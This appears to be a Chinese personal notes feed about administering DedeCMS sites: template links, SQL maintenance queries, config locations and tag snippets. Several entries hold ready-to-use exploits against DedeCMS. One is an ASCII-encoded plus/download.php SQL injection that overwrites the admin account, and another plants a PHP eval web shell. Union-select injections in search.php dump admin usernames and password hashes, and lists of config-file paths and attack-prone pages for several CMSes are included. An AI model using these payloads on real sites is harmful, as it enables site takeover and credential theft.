微博搜索

关键词:微博 评论 昵称

织梦精简有风险的文件批处理(dede后台文件夹,plus文件夹 等)(由本博客本人编写 转载请注明)
链接: http://pan.baidu.com/s/1nuJH1TR 密码: 1fv5

2017/8/25 16:29:30 通过网页

织梦蓝白博客新闻站群通用文章类整站模板 预览
蓝色通用织梦博客模板 预览

2017/8/12 15:27:51 通过网页

看起来还不错的模板 PC版本 手机版本 详情
织梦手机版生成html插件

2017/3/13 16:05:03 通过网页

缩略图改造
alter table dede_archives add litpic8 tinyint(1) default '0';
alter table dede_archives add litpiccount TEXT(400)

2017/1/22 10:51:04 通过网页

织梦导出文章、栏目数据切换模板
需要备份的数据库表:
dede_archives
dede_addonarticle
dede_arctiny
dede_arctype
dede_flink
dede_uploads

2017/1/20 23:06:05 通过网页

出现“Call to undefined function dede_htmlspecialchars()”错误提示。
解决办法如下:
打开common.func.php,搜索“function RunApp”,在这个函数的上面添加织梦新版本新增的函数:dede_htmlspecialchars
function dede_htmlspecialchars($str) {
global $cfg_soft_lang;
if (version_compare(PHP_VERSION, '5.4.0', '<')) return htmlspecialchars($str);
if ($cfg_soft_lang=='gb2312') return htmlspecialchars($str,ENT_COMPAT,'ISO-8859-1');
else return htmlspecialchars($str);
}

2016/11/1 15:00:21 通过网页

织梦SEO内页栏目页tdk配置
list分类调description
{dede:field name='description' function='html2text(@me)'/}
文章调description
{dede:field.description function='html2text(@me)'/}
文章 分类 调keywords
{dede:field name='keywords'/}

2016/10/28 18:06:41 通过网页

dedecms移动端静态化
http://bbs.zhanzhang.baidu.com/forum.php?mod=attachment&aid=NjY2NDl8YjhiY2JjZjR8MTQ3MjQ1NDY0NHw4MDIxODJ8MTE0Mjgx

2016/9/1 15:38:27 通过网页

update dede_arctype set isdefault=-1
update dede_archives set ismake=-1

2016/7/15 11:14:53 通过网页

医学 链接

2016/7/2 15:40:01 通过网页

DEDECMS数据库配置文件在哪?如何进行配置
dede数据库配置文件所在路径为:/data/common.inc.php
$cfg_dbhost = 'localhost';网站地址
$cfg_dbname = 'data';数据库名
$cfg_dbuser = 'data_user';数据库用户名
$cfg_dbpwd = 'admin';数据库连接密码
$cfg_dbprefix = 'dede_';数据库前缀
$cfg_db_language = 'gbk';数据库语言版本

2016/7/2 15:18:15 通过网页

DEDE5.7 清空所有文章且以后新建文章ID从1开始
delete from dede_addonarticle;
delete from dede_addonimages;
delete from dede_archives;
delete from dede_arctiny;
delete from dede_co_htmls;
delete from dede_co_urls;
delete from dede_co_mediaurls;
delete from dede_tagindex ;
delete from dede_taglist;
delete from dede_keywords;
在后台直接运行上面的语句,意思是清空文章和原来采集过的记录
TRUNCATE TABLE `dede_archives`;
再在后台直接运行上面的语句
TRUNCATE TABLE `dede_archives`;
使用SQL的清空表的命令。ID就会从1开始。
dede文章删除后 id从1开始设置方法
只需要执行三条SQL语句就可以了:
1、 ALTER TABLE `dede_archives` AUTO_INCREMENT =1; 主表
2、ALTER TABLE `dede_arctiny` AUTO_INCREMENT =1; 微表
3、ALTER TABLE `dede_addonarticle` AUTO_INCREMENT =1; 附加表
很多人 都是只将主表dede_archives id设置为了1,这样还不行。一定要同时将微表dede_arctiny和附加表dede_addonarticle一并执行了这样id才可从1开始。

ALTER TABLE `dede_archives` AUTO_INCREMENT =1;
ALTER TABLE `dede_arctiny` AUTO_INCREMENT =1;
ALTER TABLE `dede_addonarticle` AUTO_INCREMENT =1;

2016/7/2 15:17:19 通过网页

织梦调用作者{dede:field.writer/} [field:writer/]
来源 {dede:field.source/}
责任编辑{dede:adminname/}
>>更多

2016/6/29 22:17:18 通过网页

砍柴网http://www.moke8.com/dedecms/m63982/

2016/6/23 0:35:09 通过网页

模板http://www.xiuzhanwang.com/dedecms_zx/568.html

2016/6/23 0:32:39 通过网页

plus/download.php
构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #
完整SQL语句:
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'
EXP:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
如果不出问题,后台登录用户spider密码admin
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
如果找不到后台,参见以前修改数据库直接拿SHELL的方法:
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'','''');{/dede:php}' WHERE `aid` =1 LIMIT 1 ;
EXP:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
会在plus目录生成 x.php 密码 m
http://127.0.0.1/plus/x.php
update成功后还要访问下 /plus/mytag_js.php/aid=1
失败原因:
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
配图:
1.查看dede当前版本,补丁情况:
http://www.nxadmin.com/data/admin/ver.txt

2016/6/15 18:27:30 通过网页

利用工具:链接

2016/6/15 18:16:14 通过网页

工具软件:通杀dedecms plus/search.php漏洞利用

/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
member/operation.php

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

PHPCMS V9 \phpcms\base.php
PHPWIND8.7 \data\sql_config.php
DEDECMS5.7 \data\common.inc.php
DiscuzX2 \config\config_global.php
Wordpress \wp-config.php
Metinfo \include\head.php

/manager/ewebeditor/admin/default.php

2016/6/15 17:49:46 通过网页

dedecms织梦搜索页利用
/* 代码0
/plus/search.php?keyword=as&typeArr[ uNion ]=a


/* 代码1
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a"
Dim exp2 As String = "/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,6

/* 代码2
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
Error infos: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,2' at line 1
Error sql: SELECT channeltype FROM `www_arctype` WHERE id=11=@`\'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `www_admin`#@`\'` LIMIT 0,1;

2016/6/15 17:40:43 通过网页

国产cms利用dedecms织梦-php168齐博-ecshop
【dedecms 织梦cms】
/plus/flink_add.php 友情链接页面
/member/index_do.php?fmdo=user&dopost=regnew 会员注册页面
/plus/erraddsave.php 挑错页面
/plus/search.php 搜索页面
/plus/heightsearch.php 高级搜索页面
/plus/guestbook.php 留言板
/tags.php tag页面
/member/index.php?uid= 会员
【齐博cms 上传】
会员中心:/member/
会员页 /member/homepage.php?uid=
注册入口:/do/reg.php
登陆入口/do/login.php
搜索页面 /do/search.php
投稿 /do/post.php
投稿发布 /member/post.php?job=postnew&fid=3
友链 /do/friendlink.php /do/friendlink.php?job=apply
密码找回 /do/sendpwd.php
【ecshop】
/admin/privilege.php 后台
/search.php 搜索
/user.php?act=register 会员注册
/user.php 用户登陆
/flow.php 购物车
/tag_cloud.php 标签云
/pick_out.php 网站地图
/quotation.php 报价
/article.php?id= 文件路径
/message.php 留言板

2016/6/8 14:55:11 通过网页

共计:48 条记录 每页:20条123